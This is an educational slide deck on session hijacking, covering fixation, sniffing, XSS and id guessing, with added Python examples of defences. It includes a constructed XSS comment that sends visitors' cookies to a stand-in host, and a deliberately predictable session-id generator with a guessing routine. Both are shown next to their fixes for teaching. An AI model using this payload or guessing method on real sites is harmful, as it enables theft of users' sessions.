Ram Santhanam Application Level Attacks - Session Hijacking & Defences

1 Application Level Attacks - Session Hijacking & Defences
Project Presentation by Ram Santhanam

2 What is a session?
Definition from FOLDOC: a lasting connection between a user (or user agent, i.e. browser) and a server, usually involving the exchange of many requests.
- Typically maintained by the server
- Includes a data store or table holding user state and other user-specific information
- Includes an index into that table (the session key or session-id)
- Created on the first request or after an authentication process
- The session-id is exchanged between browser and server on every request
Different ways to exchange session-ids:
- URL rewriting
- Hidden form fields
- Cookies (most common)
Hijacking: stealing this session-id and using it to impersonate the user and access their data. It is a passive attack and difficult to detect.

3 Typical Session

4 Attack Methods
- Guessing the session-id: short length, predictable values
- Session fixation: a predictable id, or a session created before authentication whose id is kept after login
- Security vulnerabilities in hops: trusting private networks, vulnerabilities in web servers, etc.
- Session sniffing (typical on non-SSL sessions): attacker on the same subnet as the client or the server
- Man-in-the-middle attack (SSL): ARP poisoning, DNS spoofing
- Cross-site scripting (XSS): the user trusts the source, the application has an injection vulnerability

5 Session Sniffing

6 Man in the Middle Attack

7 Cross Site Scripting (XSS)
The attacker inserts a rogue script into a trusted site; when other users load the page, the script runs in their browsers and can read and forward their session-id. Common on social / community sites.
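To make the slide concrete, here is an added example (not from the original presentation) of the two halves of a stored XSS on a "community site" comment page: a constructed attacker comment that ships the visitor's cookie, rendered once by a vulnerable template that interpolates user input raw and once by a hardened template that output-encodes it. The host name evil.example and the page template are assumptions made for the illustration.

```python
import html

# Constructed sample: a comment an attacker posts to the community site.
# The script would send every visitor's cookie (the session-id) to the
# attacker's host; "evil.example" is a hypothetical name for illustration.
ATTACKER_COMMENT = (
    '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'
)

# Assumed page template; {body} marks where the comment is inserted.
PAGE_TEMPLATE = (
    '<html><body><h1>Comments</h1>'
    '<div class="comment">{body}</div>'
    '</body></html>'
)


def render_vulnerable(comment: str) -> str:
    """Interpolates user input straight into the page: the browser parses the
    comment as HTML, so the injected <script> executes for every visitor."""
    return PAGE_TEMPLATE.replace("{body}", comment)


def render_hardened(comment: str) -> str:
    """Output-encodes user input (the 'input validation' defence on slide 8):
    <, >, &, and quotes become entities, so the comment is shown as text and
    never becomes a script element."""
    return PAGE_TEMPLATE.replace("{body}", html.escape(comment, quote=True))


def contains_live_script(rendered: str) -> bool:
    """Crude indicator used only to show the difference between the two
    renderings: does a real <script element survive in the page markup?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable page runs the script:", contains_live_script(render_vulnerable(ATTACKER_COMMENT)))
    print("hardened page runs the script:  ", contains_live_script(render_hardened(ATTACKER_COMMENT)))
    print(render_hardened(ATTACKER_COMMENT))
```

The encoding must be applied at output time in the HTML context the data lands in; rejecting some characters on input (the slide's "input validation") is a second line of defence, not a substitute.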

8 Defence Methods
- Educating the users: paying attention to https vs. non-https; properly signing out; not clicking on links but copying and pasting them
- Using high entropy in session-id generation (see the Tomcat example): the higher the entropy, the harder the id is to predict
- Timing out sessions: reduces the window of vulnerability
- Using SSL for all communications: difficult to sniff
- Forcing re-authentication or step-up authentication: limits the damage if a session is hijacked
- Re-generating session-ids
- Using context data to validate session-ids: makes a hijacked id difficult to use
- Input validation: prevents XSS and other vulnerabilities
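The following added example (written for this page, not code from the presentation) ties the session-fixation attack of slide 4 to three of the defences on this slide: an in-memory session store that can be configured to re-generate the id on login, to bind the session to context data, and that expires idle sessions. It runs the fixation flow (attacker obtains an unauthenticated id, the victim logs in with it, the attacker presents it) against each configuration. The 15-minute idle timeout, the choice of client address plus User-Agent as context, and the client records are assumptions for the illustration.

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds; assumed value, the slide gives no number


def fingerprint(client: dict) -> str:
    """Context data bound to a session. Assumed choice: client address + User-Agent."""
    raw = client["addr"] + "|" + client["user_agent"]
    return hashlib.sha256(raw.encode()).hexdigest()


class SessionStore:
    """Server-side session table keyed by session-id (slide 2), with switchable defences."""

    def __init__(self, regenerate_on_login: bool, bind_context: bool):
        self.sessions = {}  # session-id -> {"user", "fp", "last"}
        self.regenerate_on_login = regenerate_on_login
        self.bind_context = bind_context

    @staticmethod
    def new_id() -> str:
        return secrets.token_hex(16)  # 128 bits from the OS CSPRNG, never guessable

    def create(self, client: dict) -> str:
        """Pre-authentication session, created on the first request."""
        sid = self.new_id()
        self.sessions[sid] = {"user": None, "fp": fingerprint(client), "last": time.time()}
        return sid

    def login(self, sid: str, user: str, client: dict) -> str:
        """Authenticates the session. The hardened store issues a fresh id here,
        so an id planted before login is worthless afterwards."""
        rec = self.sessions.pop(sid, None) or {}
        rec.update(user=user, fp=fingerprint(client), last=time.time())
        if self.regenerate_on_login:
            sid = self.new_id()
        self.sessions[sid] = rec
        return sid

    def user_for(self, sid: str, client: dict, now: float = None):
        """Resolves a presented id; None if unknown, idle too long, or from the wrong context."""
        now = time.time() if now is None else now
        rec = self.sessions.get(sid)
        if rec is None:
            return None
        if now - rec["last"] > IDLE_TIMEOUT:          # timing out sessions
            del self.sessions[sid]
            return None
        if self.bind_context and rec["fp"] != fingerprint(client):  # context validation
            return None
        rec["last"] = now
        return rec["user"]


# Constructed clients for the walkthrough.
VICTIM = {"addr": "10.0.0.5", "user_agent": "Mozilla/5.0 (victim browser)"}
ATTACKER = {"addr": "203.0.113.9", "user_agent": "curl/8.0"}


def fixation_attack_succeeds(store: SessionStore) -> bool:
    """Slide 4's session fixation: attacker gets a pre-auth id, delivers it to the
    victim (e.g. in a link), the victim logs in with it, the attacker presents it."""
    planted = store.create(ATTACKER)
    store.login(planted, "alice", VICTIM)
    return store.user_for(planted, ATTACKER) == "alice"


def victim_session_works(store: SessionStore) -> bool:
    """The defences must not break the legitimate user's session."""
    sid = store.login(store.create(VICTIM), "alice", VICTIM)
    return store.user_for(sid, VICTIM) == "alice"


def session_expires_when_idle(store: SessionStore) -> bool:
    sid = store.login(store.create(VICTIM), "alice", VICTIM)
    later = time.time() + IDLE_TIMEOUT + 1
    return store.user_for(sid, VICTIM, now=later) is None


if __name__ == "__main__":
    for regen, bind in [(False, False), (True, False), (False, True), (True, True)]:
        store = SessionStore(regenerate_on_login=regen, bind_context=bind)
        print(f"regenerate={regen!s:5} bind_context={bind!s:5} -> "
              f"fixation succeeds: {fixation_attack_succeeds(store)}")
```

Either defence alone stops the fixation flow: re-generation discards the planted id at login, and context binding refuses the attacker's request because the fingerprint recorded at login is the victim's. Context binding is a heuristic (clients behind proxies change addresses), which is why the slide lists it as making a hijacked id "difficult" to use rather than impossible.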

9 Tomcat Session Id generation
- The session id is derived from a random number. For random number generation, Java's SecureRandom class is used, a cryptographically strong random number generator (the JDK's implementation is built on SHA-1).
- The seed (64 bit) for the generator is constructed by bitwise XORing the system time with an entropy string.
- The entropy string is a hash value constructed from the device drivers running on the server.
- Using SecureRandom, a 16-byte (128-bit) random number is generated.
- A one-way hash of the random number is computed.
- The hash is encoded as 32 hexadecimal characters by taking 4 bits at a time from the 16 bytes.
- This 32-character string (32 bytes of ASCII, carrying 128 bits of value) is used as the jsessionid.
Note that hex encoding does not add entropy: 32 hex characters represent 128 bits, not 256. And if the generator is seeded only with a 64-bit value, the ids cannot carry more than 64 bits of entropy however long they are; the generator must pick up fresh entropy from the system.
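As an added example (written for this page, not Tomcat's own code), the generation steps above carried out in Python, next to the kind of predictable generator slide 4 warns about and the guessing step an attacker would run against it. Python's secrets module stands in for SecureRandom; MD5 is used as the one-way hash only because its 16-byte output matches the slide's "16 bytes to 32 hex characters" step, and the counter-plus-start-time weak generator is a constructed example.

```python
import hashlib
import secrets


def tomcat_style_session_id() -> str:
    """Follows the slide: 16 CSPRNG bytes, a one-way hash, 32 hex characters."""
    random_bytes = secrets.token_bytes(16)       # 128 bits from the OS CSPRNG (stand-in for SecureRandom)
    digest = hashlib.md5(random_bytes).digest()  # one-way hash; 16-byte output as on the slide.
    # The hash only mixes bits: all unpredictability comes from random_bytes,
    # so the id is only as strong as the generator (and its seeding) behind it.
    return digest.hex()                          # 4 bits per hex character: 32 characters = 128 bits


def hex_entropy_bits(session_id: str) -> int:
    """Upper bound on the entropy a hex-encoded id can carry (4 bits per character)."""
    return 4 * len(session_id)


class PredictableGenerator:
    """Deliberately weak generator (constructed example): a per-session counter
    placed next to the process start time. Both halves are easy to learn."""

    def __init__(self, start_time: int, first_counter: int = 1000):
        self.start_time = start_time
        self.counter = first_counter

    def next_id(self) -> str:
        self.counter += 1
        return f"{self.counter:08x}{self.start_time:08x}"


def guess_next_ids(observed_id: str, window: int = 100) -> set:
    """Attacker's guessing step (slide 4): from one observed weak id, enumerate
    the next `window` ids the generator can emit for other users."""
    counter, suffix = int(observed_id[:8], 16), observed_id[8:]
    return {f"{counter + i:08x}{suffix}" for i in range(1, window + 1)}


if __name__ == "__main__":
    sid = tomcat_style_session_id()
    print(sid, "->", hex_entropy_bits(sid), "bits at most")
    weak = PredictableGenerator(start_time=0x5A1B2C3D)
    seen = weak.next_id()                 # attacker's own session-id
    victim = weak.next_id()               # the next user's session-id
    print("weak id guessed from one observation:", victim in guess_next_ids(seen))
```

Against the strong generator the same guessing step faces 2^128 candidates per id, which is what "high entropy" on slide 8 buys; against the weak one a single observed id narrows the next user's id to a handful of guesses.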

10 Questions?
